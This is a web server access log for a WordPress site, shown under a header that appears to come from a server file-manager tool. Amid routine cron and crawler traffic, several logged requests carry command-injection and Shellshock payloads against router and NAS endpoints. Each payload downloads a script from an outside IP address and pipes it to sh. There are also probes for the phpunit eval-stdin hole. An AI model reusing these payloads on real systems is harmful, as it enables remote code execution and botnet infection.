HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2025-10-03.log
36.133.115.36 - - [03/Oct/2025:00:01:57 +0800] "POST /wp-cron.php?doing_wp_cron=1759420917.0180830955505371093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:00:01:57 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:00:13:44 +0800] "POST /wp-cron.php?doing_wp_cron=1759421624.1120491027832031250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [03/Oct/2025:00:13:44 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [03/Oct/2025:00:15:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759421726.3947460651397705078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.134.148.59 - - [03/Oct/2025:00:15:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:00:16:56 +0800] "POST /wp-cron.php?doing_wp_cron=1759421816.8222589492797851562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [03/Oct/2025:00:16:57 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:00:33:47 +0800] "POST /wp-cron.php?doing_wp_cron=1759422827.5953810214996337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [03/Oct/2025:00:33:47 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:00:48:27 +0800] "POST /wp-cron.php?doing_wp_cron=1759423707.4199829101562500000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.137.73.221 - - [03/Oct/2025:00:48:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.108.119 - - [03/Oct/2025:00:50:45 +0800] "HEAD /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.115.36 - - [03/Oct/2025:00:53:04 +0800] "POST /wp-cron.php?doing_wp_cron=1759423984.1537969112396240234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.8.42 - - [03/Oct/2025:00:53:04 +0800] "GET /manager/text/list HTTP/1.1" 404 8990 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [03/Oct/2025:00:56:39 +0800] "POST /wp-cron.php?doing_wp_cron=1759424199.5553340911865234375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:00:56:39 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:01:13:30 +0800] "POST /wp-cron.php?doing_wp_cron=1759425210.0451219081878662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [03/Oct/2025:01:13:31 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
45.142.195.99 - - [03/Oct/2025:01:13:39 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.88.186.85 - - [03/Oct/2025:01:20:02 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
36.133.115.36 - - [03/Oct/2025:01:20:03 +0800] "POST /wp-cron.php?doing_wp_cron=1759425603.2930650711059570312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.88.186.85 - - [03/Oct/2025:01:20:03 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - ffadmin [03/Oct/2025:01:20:04 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - ffadmin [03/Oct/2025:01:20:06 +0800] "POST /apply.cgi HTTP/1.1" 499 0 "http://36.133.115.36/apply.cgi" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:09 +0800] "GET / HTTP/1.1" 499 0 "-" "() { :; }; /bin/bash -c \x22(wget -qO- http://74.194.191.52/rondo.qre.sh||busybox wget -qO- http://74.194.191.52/rondo.qre.sh||curl -s http://74.194.191.52/rondo.qre.sh)|sh\x22& #Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [03/Oct/2025:01:20:10 +0800] "POST /goform/SystemCommand HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:10 +0800] "GET /cgi-bin/shortcut_telnet.cgi?wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wyu.sh%7Csh%26 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:11 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [03/Oct/2025:01:20:12 +0800] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 404 31381 "http://36.133.115.36/cfg_system_time.htm" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [03/Oct/2025:01:20:15 +0800] "POST /goform/mp HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - admin [03/Oct/2025:01:20:15 +0800] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 31381 "http://36.133.115.36/cgi-bin/server/server.cgi?func=server02_main_submit&counter=6.7496022225883&TEST_BTN4=" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:16 +0800] "POST /cgi-bin/system_mgr.cgi? HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:18 +0800] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:20 +0800] "POST /goform/Mail_Test HTTP/1.0" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:20 +0800] "GET /HNAP1/ HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:21 +0800] "GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sbx.sh|sh&echo${IFS} HTTP/1.0" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.88.186.85 - - [03/Oct/2025:01:20:25 +0800] "GET /setup.cgi?todo=funjsq_login&funjsq_access_token=12345|busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.fep.sh%7Csh%0A&test=11%00currentsetting.htm HTTP/1.1" 499 0 "-" "Mozilla/5.0 (makenoise@tutanota.de)"
45.89.70.30 - - [03/Oct/2025:01:23:01 +0800] "GET / HTTP/1.0" 200 165852 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
45.89.70.30 - - [03/Oct/2025:01:23:02 +0800] "GET /contacts/ HTTP/1.0" 200 76104 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [03/Oct/2025:01:23:04 +0800] "POST /wp-cron.php?doing_wp_cron=1759425784.1256339550018310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.70.30 - - [03/Oct/2025:01:23:06 +0800] "POST /contacts/ HTTP/1.0" 200 68823 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
36.133.115.36 - - [03/Oct/2025:01:25:28 +0800] "POST /wp-cron.php?doing_wp_cron=1759425928.2609329223632812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.125 - - [03/Oct/2025:01:25:28 +0800] "HEAD /goform/SystemCommand HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:01:26:16 +0800] "POST /wp-cron.php?doing_wp_cron=1759425976.7852609157562255859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [03/Oct/2025:01:26:16 +0800] "HEAD /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.djc.sh%7Csh%3B%27 HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
36.133.108.119 - - [03/Oct/2025:01:33:41 +0800] "HEAD /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
42.236.17.18 - - [03/Oct/2025:01:47:37 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [03/Oct/2025:01:47:57 +0800] "POST /wp-cron.php?doing_wp_cron=1759427277.5589780807495117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [03/Oct/2025:01:47:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:02:02:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759428163.8132150173187255859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [03/Oct/2025:02:02:43 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [03/Oct/2025:02:02:45 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [03/Oct/2025:02:04:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759428266.1225399971008300781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:02:04:26 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:02:14:19 +0800] "POST /wp-cron.php?doing_wp_cron=1759428859.0702788829803466796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [03/Oct/2025:02:14:19 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:02:17:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759429063.5384640693664550781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.172.105.25 - - [03/Oct/2025:02:17:43 +0800] "GET /config/getuser?index=0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
20.120.134.35 - - [03/Oct/2025:02:24:02 +0800] "GET /services/ HTTP/1.1" 200 97617 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0"
36.133.115.36 - - [03/Oct/2025:02:28:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759429723.7804889678955078125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.54.138 - - [03/Oct/2025:02:28:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.54.138 - - [03/Oct/2025:02:28:46 +0800] "GET / HTTP/1.1" 200 33466 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [03/Oct/2025:02:42:37 +0800] "POST /wp-cron.php?doing_wp_cron=1759430557.4906659126281738281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.133.241 - - [03/Oct/2025:02:42:37 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [03/Oct/2025:02:44:00 +0800] "POST /wp-cron.php?doing_wp_cron=1759430640.0252089500427246093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.232.38 - - [03/Oct/2025:02:44:00 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000 HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [03/Oct/2025:02:52:30 +0800] "POST /wp-cron.php?doing_wp_cron=1759431150.3235130310058593750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
81.162.106.44 - - [03/Oct/2025:02:52:31 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
36.133.115.36 - - [03/Oct/2025:02:56:55 +0800] "POST /wp-cron.php?doing_wp_cron=1759431415.1909129619598388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.2.64.59 - - [03/Oct/2025:02:56:55 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [03/Oct/2025:03:12:00 +0800] "POST /wp-cron.php?doing_wp_cron=1759432320.7948911190032958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:03:12:01 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:03:14:20 +0800] "POST /wp-cron.php?doing_wp_cron=1759432460.3005750179290771484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [03/Oct/2025:03:14:20 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:03:38:37 +0800] "POST /wp-cron.php?doing_wp_cron=1759433917.4922480583190917968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [03/Oct/2025:03:38:37 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:03:46:56 +0800] "POST /wp-cron.php?doing_wp_cron=1759434416.1418159008026123046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [03/Oct/2025:03:46:56 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:03:58:28 +0800] "POST /wp-cron.php?doing_wp_cron=1759435108.6674160957336425781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.227.36.10 - - [03/Oct/2025:03:58:28 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
20.171.207.214 - - [03/Oct/2025:03:58:29 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [03/Oct/2025:04:09:01 +0800] "POST /wp-cron.php?doing_wp_cron=1759435741.1061580181121826171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [03/Oct/2025:04:09:01 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:04:10:41 +0800] "POST /wp-cron.php?doing_wp_cron=1759435841.5684909820556640625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.172.105.18 - - [03/Oct/2025:04:10:41 +0800] "GET / HTTP/1.1" 200 33466 "-" "Linux Gnu (cow)"
36.133.115.36 - - [03/Oct/2025:04:11:19 +0800] "POST /wp-cron.php?doing_wp_cron=1759435879.7286019325256347656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:04:11:20 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.108.119 - - [03/Oct/2025:04:27:18 +0800] "HEAD /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:04:46:15 +0800] "POST /wp-cron.php?doing_wp_cron=1759437975.2108550071716308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
18.206.250.151 - - [03/Oct/2025:04:46:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:04:48:11 +0800] "POST /wp-cron.php?doing_wp_cron=1759438091.2388169765472412109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
144.172.105.25 - - [03/Oct/2025:04:48:11 +0800] "GET /config/getuser?index=0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
36.133.115.36 - - [03/Oct/2025:05:15:09 +0800] "POST /wp-cron.php?doing_wp_cron=1759439709.9165050983428955078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:05:15:10 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:05:16:26 +0800] "POST /wp-cron.php?doing_wp_cron=1759439786.8295159339904785156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [03/Oct/2025:05:16:27 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:05:36:01 +0800] "POST /wp-cron.php?doing_wp_cron=1759440961.8827250003814697265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [03/Oct/2025:05:36:02 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:06:00:16 +0800] "POST /wp-cron.php?doing_wp_cron=1759442416.3760280609130859375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
116.179.32.37 - - [03/Oct/2025:06:00:16 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fbug%2F HTTP/1.1" 200 1105 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [03/Oct/2025:06:19:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759443583.1952769756317138671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:06:19:43 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:06:25:36 +0800] "POST /wp-cron.php?doing_wp_cron=1759443936.9073319435119628906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.109 - - [03/Oct/2025:06:25:36 +0800] "GET / HTTP/1.1" 301 5 "-" "l9tcpid/v1.1.0"
58.45.88.206 - - [03/Oct/2025:06:26:15 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
36.133.115.36 - - [03/Oct/2025:06:42:55 +0800] "POST /wp-cron.php?doing_wp_cron=1759444975.3642129898071289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
125.94.144.102 - - [03/Oct/2025:06:42:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
125.94.144.102 - - [03/Oct/2025:06:43:03 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [03/Oct/2025:06:48:04 +0800] "POST /wp-cron.php?doing_wp_cron=1759445284.3464009761810302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [03/Oct/2025:06:48:04 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:07:15:03 +0800] "POST /wp-cron.php?doing_wp_cron=1759446903.0549860000610351562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.195.99 - - [03/Oct/2025:07:15:03 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:07:19:29 +0800] "POST /wp-cron.php?doing_wp_cron=1759447168.9794390201568603515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:07:19:29 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:07:21:58 +0800] "POST /wp-cron.php?doing_wp_cron=1759447318.0966649055480957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [03/Oct/2025:07:21:59 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [03/Oct/2025:08:18:42 +0800] "POST /wp-cron.php?doing_wp_cron=1759450722.5878949165344238281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [03/Oct/2025:08:18:42 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [03/Oct/2025:08:30:06 +0800] "POST /wp-cron.php?doing_wp_cron=1759451406.0510489940643310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [03/Oct/2025:08:30:06 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
